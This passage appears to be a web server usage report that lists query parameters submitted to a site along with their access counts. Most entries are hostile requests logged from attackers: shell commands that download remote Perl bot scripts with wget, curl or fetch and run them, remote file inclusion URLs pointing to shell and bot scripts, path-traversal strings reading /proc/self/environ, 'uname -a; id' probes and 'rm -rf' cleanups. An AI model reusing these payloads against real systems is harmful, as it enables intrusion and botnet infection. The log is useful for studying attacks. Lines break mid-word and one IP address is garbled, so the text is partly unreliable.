1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
15
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt
10
id 6
uname -a; id 5
cd /tmp;wget http://www.freewebs.com/novoil/acs;curl -O http
://www.freewebs.com/novoil/acs ;perl acs; rm -rf acs*; rm -r
f acs*
3
cd /tmp;rm start.txt;wget http://189.24.38.227/start.txt;fet
ch http://189.24.38.227/start.txt;lwp-download http://189.24
.38.227/start.txt;curl -O http://189.24.38.227/start.txt;lyn
x http://189.24.38.227/start.txt;perl start.txt;rm start.txt
3
cd /tmp;rm botnet.txt;wget http://euseiquefiz.no-ip.info/bot
net.txt;fetch http://euseiquefiz.no-ip.info/botnet.txt;lwp-d
ownload http://euseiquefiz.no-ip.info/botnet.txt;curl -O htt
p://euseiquefiz.no-ip.info/botnet.txt;lynx http://euseiquefi
z.no-ip.info/botnet.txt;perl botnet.txt
3
cd /tmp;rm start.txt;wget http://189.24.38.250:8090/start.tx
t;fetch http://189.24.38.250:8090/start.txt;lwp-download htt
p://189.24.38.250:8090/start.txt;curl -O http://189.24.38.25
0:8090/start.txt;lynx http://189.24.38.250:8090/start.txt;pe
rl start.txt;rm start.txt
3
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm sta.txt
3
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet
ch http://189.24.138.40/start.txt;lwp-download http://189.24
.138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn
x http://189.24.138.40/start.txt;perl start.txt;rm start.txt
2
Parameter list
ValueAccesses
1 10
OTHER: 1,409
ScriptTotal Accesses
/wusage/monthly/2010/12/01/ 1,802
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
12 119
11 2
27 1
Parameter Option
ValueAccesses
com_myblog 76
com_google 2
Parameter amp;view
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 4
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 217
..//..//..//..//..//..//..//..///proc/self/environ 00 192
../../../../../../../../../../../../../../../proc/self/envir
on
127
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
68
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
37
//..//..//..//..//..//..//..//..///proc/self/environ 00 17
..//..//..//..//..//..//..//..//..//..//..///proc/self/z3n 15
../../../../../../../../../../..//proc/self/environ 00 12
../../../../../../../../../../../../../../..//proc/self/envi
ron 00
9
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir
on
8
Parameter option
ValueAccesses
com_google 544
com_myblog 118
com_fabrik 41
com_rwcards 33
com_gcalendar 16
com_rokdownloads 5
com_product 4
com_rwcards/?custompluginfile[]=../../../../../../../../../.
./../../..//proc/self/environ 00
1
Parameter task
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 44
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
31
..//..//..//..//..//..//..//..///proc/self/environ 00 25
../../../../../../../../../../../../../../../proc/self/envir
on
10
../../../../../../../../../../../../../../..//proc/self/envi
ron 00
9
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
3
Parameter view
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 6
rwcards 1
OTHER: 5
ScriptTotal Accesses
/wusage//// 1,624
Parameters by Submitted Value
Parameter CONFIG[main_path]
ValueAccesses
http://ourfathersworld.org/wp-content/themes/default/idxx.tx
t??
4
Parameter DOCUMENT_ROOT
ValueAccesses
http://www.imoralro.com.br/forum/public/style_css/css_2/id1.
txt???
2
http://www.candidography.com/zero/id1.txt?? 2
http://lnx.mp3dmultimediastudio.it/demo/id1?? 2
http://gumansin.com/id.txt?? 1
http://fpappalardo.com/logs/baner.txt?? 1
Parameter DOCUMEN_ROOT[PATH]
ValueAccesses
http://www.howtolisten.kr//parti/data/admin/auto1.txt??? 2
Parameter GALLERY_BASEDIR
ValueAccesses
http://musicadelibreria.net/footer?? 1
Parameter SERVER[DOCUMENT_ROOT]
ValueAccesses
http://www.iheard.us/language/pdf_fonts/id1.txt?? 1
Parameter _PHPLIB[libdir]
ValueAccesses
http://gbdata.co.uk/images/zd1.txt???? 16
http://antigua.granada.notariado.org//includes/id1.txt? 10
http://phamsight.com/docs/images/head?? 10
http://www.wvblazers.com//administrator/components/com_virtu
emart/sql/other/c1.txt?
6
http://ourchat8.110mb.com/images/moncrot1.gif? 3
http://www.tourgaja.net/www/data/sc1?? 2
http://newtabe.110mb.com/identi.jpg? 2
http://www.reducereuserecycle.com.au/core/id1.txt?? 2
http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? 2
http://www.semihow.com/sh/amboard/compile/default_basic/admi
n/mydb.txt??
2
Parameter _SERVER[DOCUMENT_ROOT]
ValueAccesses
http://musicadelibreria.net/footer?? 51
http://phamsight.com/docs/images/head?? 36
http://alandar.net/www2/log1.txt? 25
|echo "casper";echo "kae";| 14
http://aboutav.com//id1.txt??? 13
http://www.koreadefence.net/data/shirohige/zfxid.txt?? 12
http://www.lifeuniv.com/tmp/copyright.txt?? 12
http://www.bk21bnt.com/bbs//icon/private_name/id1.txt?? 12
http://valdes.fileave.com/scan/kil-9/idxx.txt??? 11
http://www.fileden.com/files/2009/3/30/2385100/pirates1.txt?
11
Parameter _main.php?_server[DOCUMENT_ROOT]
ValueAccesses
http://crot99.webs.com/moncrot1.gif? 1
Parameter _zb_path
ValueAccesses
http://www.princedent.com/bbs/set_up/1.txt???? 10
http://g0tr00t.pr.vc/sh3ll/fx29id1.txt? 9
http://www.corretoresdeseguros.com.br/estatisticas/id1??? 9
http://alandar.net/www2/log1.txt? 4
http://www.telephone114.com/bbs/data/__zbSessionTMP/1.txt? 4
http://www.solmae.co.kr///receipt/lib/_private/id1.txt? 4
http://www.whinercentral.com/modules/Neos_Chronos/modules/ma
war.txt??????
4
http://kb27.co.kr/bbs///id1.txt?? 4
http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? 4
http://210.205.6.168/~shop/zfxid1.txt? 3
Parameter board_skin_path
ValueAccesses
http://musicadelibreria.net/footer?? 5
OTHER: 1,295
ScriptTotal Accesses
/wusage/summary/cgi.html/administrator/components/com_extcal
endar/admin_settings.php
1,587
Parameters by Submitted Value
Parameter CONFIG_EXTADMIN_PATH]
ValueAccesses
http://www.fabiofotografo.com.br/js/var.txt?? 21
Parameter CONFIG_EXT[ADMIN_PATH
ValueAccesses
1
Parameter CONFIG_EXT[ADMIN_PATH]
ValueAccesses
http://dlnks.com/z/z/k.txt? 29
http://ownsirc.googlepages.com/botnet.txt? 29
http://invisionar.hostinggratisargentina.com/eth0? 28
http://usuarios.arnet.com.ar/adipasqua/http? 26
http://www.jungo8949.co.kr/tool25.txt? 23
http://www.mta.cl/galeria2/galery.txt? 23
http://208.74.174.183/brizola.txt? 20
http://usuarios.arnet.com.ar/larry123/exploit.txt? 19
http://www.dunakom.hu/userimages/id.txt? 19
http://www.santiagoonline.com.ar/readme.txt? 17
Parameter cmd
ValueAccesses
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc
h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br
/~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l
ynx http://eep.br/~gpereira/but.txt;perl but.txt
15
uname -a; id 11
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
11
cd /tmp;rm bn.txt;wget http://3sk3nt.by.ru/siemens.txt;fetch
http://3sk3nt.by.ru/siemens.txt;lwp-download http://3sk3nt.
by.ru/siemens.txt;curl -O http://3sk3nt.by.ru/siemens.txt;ly
nx http://3sk3nt.by.ru/siemens.txt;perl siemens.txt
9
id 6
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt;
fetch http://www.killersofdragons.com/x.txt;lwp-download htt
p://www.killersofdragons.com/x.txt;curl -O http://www.killer
sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x.
txt;perl x.txt
5
cd /tmp;rm crew.txt;wget http://eep.br/~gpereira/crew.txt;fe
tch http://eep.br/~gpereira/crew.txt;lwp-download http://eep
.br/~gpereira/crew.txt;curl -O http://eep.br/~gpereira/crew.
txt;lynx http://eep.br/~gpereira/crew.txt;perl crew.txt
5
cd /tmp;rm x.txt;wget http://189.6.162.125:8090/x.txt;fetch
http://189.6.162.125:8090/x.txt;lwp-download http://189.6.16
2.125:8090/x.txt;curl -O http://189.6.162.125:8090/x.txt;lyn
x http://189.6.162.125:8090/x.txt;perl x.txt
3
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch
http://71.41.190.203/sur0.txt;lwp-download http://71.41.190
.203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt
p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*
3
cd /tmp;rm bot.txt;wget http://www.3sk3nt.by.ru/bot.txt;fetc
h http://www.3sk3nt.by.ru/bot.txt;lwp-download http://www.3s
k3nt.by.ru/bot.txt;curl -O http://www.3sk3nt.by.ru/bot.txt;l
ynx http://www.3sk3nt.by.ru/bot.txt;perl bot.txt
3
Parameter config_ext[admin_path]
ValueAccesses
1
Parameter list
ValueAccesses
1 2
OTHER: 1,258
ScriptTotal Accesses
/wusage/weekly/// 1,557
Parameters by Submitted Value
Parameter CONFIG[path]
ValueAccesses
http://gumansin.com/pds/1.txt?? 3
Parameter DIR_PREFIX
ValueAccesses
http://www.town-classifieds.com/adpics/baner.txt??? 2
Parameter DOCUMENT_ROOT
ValueAccesses
http://dk.fileave.com/heheh.txt???? 9
http://190.81.28.182/incaware/id1.txt?? 4
Parameter FORM[session_id]
ValueAccesses
1 3
Parameter FORM[set]
ValueAccesses
1 3
Parameter GLOBALS
ValueAccesses
9
Parameter INCLUDE_FOLDER
ValueAccesses
http://www.jjdd.co.kr/nalog/plug_in_config/pro//id1??? 2
http://www.c21vox.tv/id1.txt?? 1
http://surya1.fileave.com/id.txt?? 1
http://nic.bupt.edu.cn/media/j1.txt?? 1
Parameter SERVER[DOCUMENT_ROOT]
ValueAccesses
http://www.kyokushin.hu/fx29id2.txt??? 1
Parameter _PHPLIB[libdir]
ValueAccesses
http://phamsight.com/docs/images/head?? 41
http://www.howtolisten.kr/lct/lib/list/respon1.txt? 7
http://nic.bupt.edu.cn/media/j1.txt?? 6
http://www.howtolisten.kr/sarangbi_bgm/id1.txt? 6
http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? 4
http://www.lovebyday.com/linux/Oid1.txt?? 4
http://tkosin.onmam.com/data/id1.txt?? 3
http://nic.bupt.edu.cn/media/j1.txt??? 3
http://musicadelibreria.net/footer?? 3
http://howtolisten.kr//sarangbi_bgm/id1.txt?? 3
Parameter _REQUEST
ValueAccesses
9
OTHER: 1,429
ScriptTotal Accesses
/wusage/weekly/2010/12/26/ 1,515
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
12 16
125 4
27 1
Parameter Option
ValueAccesses
com_google 1
Parameter amp;option
ValueAccesses
com_gcalendar 4
Parameter amp;view
ValueAccesses
gcalendar//?option=com_gcalendar 4
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 171
..//..//..//..//..//..//..//..///proc/self/environ 00 143
../../../../../../../../../../../../../../../proc/self/envir
on
118
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
91
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir
on
56
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
44
../../../../../../../../../../..//proc/self/environ 00 35
../../../../../../../../../../../../../../..//proc/self/envi
ron
30
../../../../../../../../../../..//proc/self/environ 00 16
../../../../../../../../../../../../..//proc/self/environ 00
10
Parameter option
ValueAccesses
com_google 652
com_fabrik 47
com_myblog 17
com_gcalendar 12
com_goole 10
com_product 1
com_xgallery 1
Parameter task
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
8
../../../../../../../../../../../../../../../proc/self/envi
ron
5
../../../../../../../../../../../../../../../proc/self/envir
on
2
..//..//..//..//..//..//..//..///proc/self/environ 00 2
OTHER: 14
ScriptTotal Accesses
/wusage/summary/cgi.html//help.php 1,498
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc
h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br
/~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l
ynx http://eep.br/~gpereira/but.txt;perl but.txt
14
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt*
14
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
11
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt
;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/
/azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b
otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet
.txt
10
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm sta.txt
9
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch
http://71.41.190.203/sur0.txt;lwp-download http://71.41.190
.203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt
p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*
9
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t
xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht
tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no-
ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p
erl botnet.txt
6
cd /tmp;rm bunda24.txt;wget http://www.octium.ru//language/b
unda24.txt;fetch http://www.octium.ru//language/bunda24.txt;
lwp-download http://www.octium.ru//language/bunda24.txt;curl
-O http://www.octium.ru//language/bunda24.txt;lynx http://w
ww.octium.ru//language/bunda24.txt;perl bunda24.txt;rm -rf *
.txt
6
cd /tmp;rm subale.txt;wget http://71.41.190.203/subale.txt;f
etch http://71.41.190.203/subale.txt;lwp-download http://71.
41.190.203/subale.txt;curl -O http://71.41.190.203/subale.tx
t;lynx http://71.41.190.203/subale.txt;perl subale.txt;rm -r
f *.txt
5
cd /tmp;rm botnet.txt;wget http://euseiquefiz.no-ip.info/bot
net.txt;fetch http://euseiquefiz.no-ip.info/botnet.txt;lwp-d
ownload http://euseiquefiz.no-ip.info/botnet.txt;curl -O htt
p://euseiquefiz.no-ip.info/botnet.txt;lynx http://euseiquefi
z.no-ip.info/botnet.txt;perl botnet.txt
5
Parameter css_path
ValueAccesses
http://www.jungo8949.co.kr/tool25.txt? 63
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? 49
http://www.capsoir.com/images/TRA.txt? 26
http://www.neoncomanda.kit.net/tool25.dat? 25
http://usuarios.arnet.com.ar/adipasqua/http? 24
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat? 18
http://www.pucorp.t5.com.br/lp.txt? 17
http://cestari.angelfire.com/lol.txt? 14
http://aszer.republika.pl/cos..txt? 13
http://h1.ripway.com/DiegoVirus/pbot.txt? 13
Parameter css_pathhttp://usuarios.arnet.com.ar/adrikrasnow/rfi/bla.txt
?
ValueAccesses
2
Parameter css_pathhttp://www.foto-web.info/phpformmail/injektion.txt?
ValueAccesses
1
OTHER: 1,144
ScriptTotal Accesses
/wusage/summary/cgi.html//js/status_image.php 1,491
Parameters by Submitted Value
Parameter base_url
ValueAccesses
http://www.jungo8949.co.kr/tool25.txt? 46
http://ownsirc.googlepages.com/botnet.txt? 31
http://www.freewebs.com/yahwek/phpbot.txt? 28
http://www.oslutadores.com/?id=23530 28
22
http://www.neoncomanda.kit.net/tool25.dat? 20
http://www.pucorp.t5.com.br/lp.txt? 18
http://yahwek.dll.googlepages.com/phpbot.txt? 15
http://lol123.fileave.com/script9.txt?? 15
http://bialoka123.fileave.com/script9.txt?? 14
Parameter cmd
ValueAccesses
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc
h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br
/~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l
ynx http://eep.br/~gpereira/but.txt;perl but.txt
12
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
11
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt
;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/
/azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b
otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet
.txt
8
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t
xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht
tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no-
ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p
erl botnet.txt
6
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt*
6
uname -a; id 5
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h
ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4
0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1
89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt
5
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt;
fetch http://www.killersofdragons.com/x.txt;lwp-download htt
p://www.killersofdragons.com/x.txt;curl -O http://www.killer
sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x.
txt;perl x.txt
5
cd /tmp;wget http://www.1peninsulaintermedia.net/familytree/
bash/priv.txt;curl -O -f http://www.1peninsulaintermedia.net
/familytree/bash/priv.txt;lynx -source http://www.1peninsula
intermedia.net/familytree/bash/priv.txt;lwp-rget http://www.
1peninsulaintermedia.net/familytree/bash/priv.txt;fetch http
://www.1peninsulaintermedia.net/familytree/bash/priv.txt;per
l priv.txt;rm -rf priv.txt;rm -rf priv001.txt
3
id 3
Parameter list
ValueAccesses
1 1
OTHER: 1,189
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_sitemap/sitemap.xml.
php
1,455
Parameters by Submitted Value
Parameter cmd
ValueAccesses
uname -a; id 10
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt
9
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm sta.txt
5
id 4
cd /tmp;killall perl -9;rm -rf *.txt;GET http://murilok.pop3
.ru/RFI3.txt > RFI3.txt;perl RFI3.txt;rm RFI3.txt
3
cd /tmp;rm srz.txt;wget http://www.freewebs.com/bl4bl4bl4bl4
/srz.txt;fetch http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;
lwp-download http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;cu
rl -O http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;lynx http
://www.freewebs.com/bl4bl4bl4bl4/srz.txt;perl srz.txt;rm -rf
srz.txt*
3
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet
ch http://189.24.138.40/start.txt;lwp-download http://189.24
.138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn
x http://189.24.138.40/start.txt;perl start.txt;rm start.txt
2
cd /tmp;rm -rf box.txt;wget http://eep.br/~gpereira/box.txt;
fetch http://eep.br/~gpereira/box.txt;lwp-download http://ee
p.br/~gpereira/box.txt;curl -O http://eep.br/~gpereira/box.t
xt;lynx http://eep.br/~gpereira/box.txt;perl box.txt;rm -rf
*.txt
2
cd /tmp;rm start.txt;wget http://189.24.38.227/start.txt;fet
ch http://189.24.38.227/start.txt;lwp-download http://189.24
.38.227/start.txt;curl -O http://189.24.38.227/start.txt;lyn
x http://189.24.38.227/start.txt;perl start.txt;rm start.txt
2
cd /tmp;rm s1t2a3r4t.txt;wget http://189.24.167.23:9090/s1t2
a3r4t.txt;fetch http://189.24.167.23:9090/s1t2a3r4t.txt;lwp-
download http://189.24.167.23:9090/s1t2a3r4t.txt;curl -O htt
p://189.24.167.23:9090/s1t2a3r4t.txt;lynx http://189.24.167.
23:9090/s1t2a3r4t.txt;perl s1t2a3r4t.txt;rm s1t2a3r4t.txt
2
Parameter list
ValueAccesses
1 9
Parameter mosCoaney.com/wusage/summary/cgi.html/help.php?css_path
ValueAccesses
http://www.digownz.kit.net/pbot1.txt?? 9
http://www.freewebs.com/t420/p.txt?? 6
http://www.freewebs.com/h1h1h1/p.txt?? 6
http://www.rj2009.kit.net/ddd.txt? 6
http://www.rj2008.kit.net/p.txt?? 6
http://www.freewebs.com/playssonn/p.txt?? 5
http://www.freewebs.com/b0mb4do1337/p.txt?? 4
http://www.digownz.kit.net/pbot1.txt? 3
http://flaw.we.bs/a.txt? 3
http://www.rj2009.kit.net/burro.txt? 2
Parameter mosConfig_absolute_path
ValueAccesses
http://www.freewebs.com/sur00tseclan/httd.txt? 42
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? 21
http://www.freewebs.com/sur00tsecurity/bot.txt? 16
http://usuarios.arnet.com.ar/larry123/http? 15
http://usuarios.arnet.com.ar/larry123/ka.txt? 15
http://usuarios.arnet.com.ar/larry123/exploit.txt? 14
http://ownsparaficar.googlepages.com/funfo.txt? 14
http://www.laila.jp/item_pics/d3rf/teste.txt????????????????
?????????????
13
http://www.j-vision.co.kr/company/rhe/echo? 12
http://ownsirc.googlepages.com/botnet.txt? 12
Parameter mosConfig_http://www.phanom.ac.th/msnlist/id.txt???
ValueAccesses
1
Parameter xroot
ValueAccesses
www.popcorn.de/cmd? 1
OTHER: 1,178
ScriptTotal Accesses
/wusage/summary/cgi.html//setup/header.php 1,453
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
11
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc
h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br
/~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l
ynx http://eep.br/~gpereira/but.txt;perl but.txt
11
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt
;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/
/azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b
otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet
.txt
8
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t
xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht
tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no-
ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p
erl botnet.txt
6
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt*
6
uname -a; id 5
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt;
fetch http://www.killersofdragons.com/x.txt;lwp-download htt
p://www.killersofdragons.com/x.txt;curl -O http://www.killer
sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x.
txt;perl x.txt
5
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h
ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4
0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1
89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt
5
cd /tmp;wget http://www.1peninsulaintermedia.net/familytree/
bash/priv.txt;curl -O -f http://www.1peninsulaintermedia.net
/familytree/bash/priv.txt;lynx -source http://www.1peninsula
intermedia.net/familytree/bash/priv.txt;lwp-rget http://www.
1peninsulaintermedia.net/familytree/bash/priv.txt;fetch http
://www.1peninsulaintermedia.net/familytree/bash/priv.txt;per
l priv.txt;rm -rf priv.txt;rm -rf priv001.txt
3
cd /tmp;rm s1t2a3r4t.txt;wget http://189.24.101.97:9090/s1t2
a3r4t.txt;fetch http://189.24.101.97:9090/s1t2a3r4t.txt;lwp-
download http://189.24.101.97:9090/s1t2a3r4t.txt;curl -O htt
p://189.24.101.97:9090/s1t2a3r4t.txt;lynx http://189.24.101.
97:9090/s1t2a3r4t.txt;perl s1t2a3r4t.txt;rm s1t2a3r4t.txt
3
Parameter css_path
ValueAccesses
http://www.jungo8949.co.kr/tool25.txt? 45
http://ownsirc.googlepages.com/botnet.txt? 31
http://www.freewebs.com/yahwek/phpbot.txt? 28
http://www.oslutadores.com/?id=23530 28
22
http://www.neoncomanda.kit.net/tool25.dat? 19
http://www.pucorp.t5.com.br/lp.txt? 18
http://yahwek.dll.googlepages.com/phpbot.txt? 16
http://lol123.fileave.com/script9.txt?? 15
http://www.capsoir.com/images/TRA.txt? 14
Parameter list
ValueAccesses
1 1
OTHER: 1,153
ScriptTotal Accesses
/wusage/monthly/2011/05/01/ 1,423
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
12 36
125 14
Parameter amp;option
ValueAccesses
com_gcalendar 14
Parameter amp;view
ValueAccesses
gcalendar//?option=com_gcalendar 35
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
175
../../../../../../../../../../../../../../../proc/self/envir
on
98
../../../../../../../../../../..//proc/self/environ 00 71
../../../../../../../../../../..//proc/self/environ 00 65
..//..//..//..//..//..//..//..///proc/self/environ 00 63
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
62
..//..//..//..//..//..//..//..///proc/self/environ 13
../../../../../../../../../../../../../../..//proc/self/envi
ron 00
12
../../../../../../../../../../../../..//proc/self/environ 00
12
../../../../../../../../../../../../../../..//proc/self/envi
ron
6
Parameter index.php?option
ValueAccesses
com_google 2
Parameter index2.php?option
ValueAccesses
com_gcalendar 1
Parameter option
ValueAccesses
com_google 475
com_gcalendar 36
com_myblog 36
com_jscalendar 33
com_juser 18
com_product 16
com_ccnewsletter 14
com_rokdownloads 13
com_fabrik 10
com_goole 1
Parameter task
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
29
../../../../../../../../../../../../../../../proc/self/envir
on
7
Parameter view
ValueAccesses
../../../../../../../../../../../../../../../proc/self/envir
on
18
../../../../../../../../../../../../..//proc/self/environ 00
12
../../../../../../../../../../../../../../..//proc/self/envi
ron 00
10
OTHER: 16
ScriptTotal Accesses
/wusage/weekly//// 1,421
Parameters by Submitted Value
Parameter CONFIG[main_path]
ValueAccesses
http://ourfathersworld.org/wp-content/themes/default/idxx.tx
t??
4
Parameter DOCUMENT_ROOT
ValueAccesses
http://www.imoralro.com.br/forum/public/style_css/css_2/id1.
txt???
2
http://www.candidography.com/zero/id1.txt?? 2
http://lnx.mp3dmultimediastudio.it/demo/id1?? 1
http://gumansin.com/id.txt?? 1
Parameter DOCUMEN_ROOT[PATH]
ValueAccesses
http://www.howtolisten.kr//parti/data/admin/auto1.txt??? 2
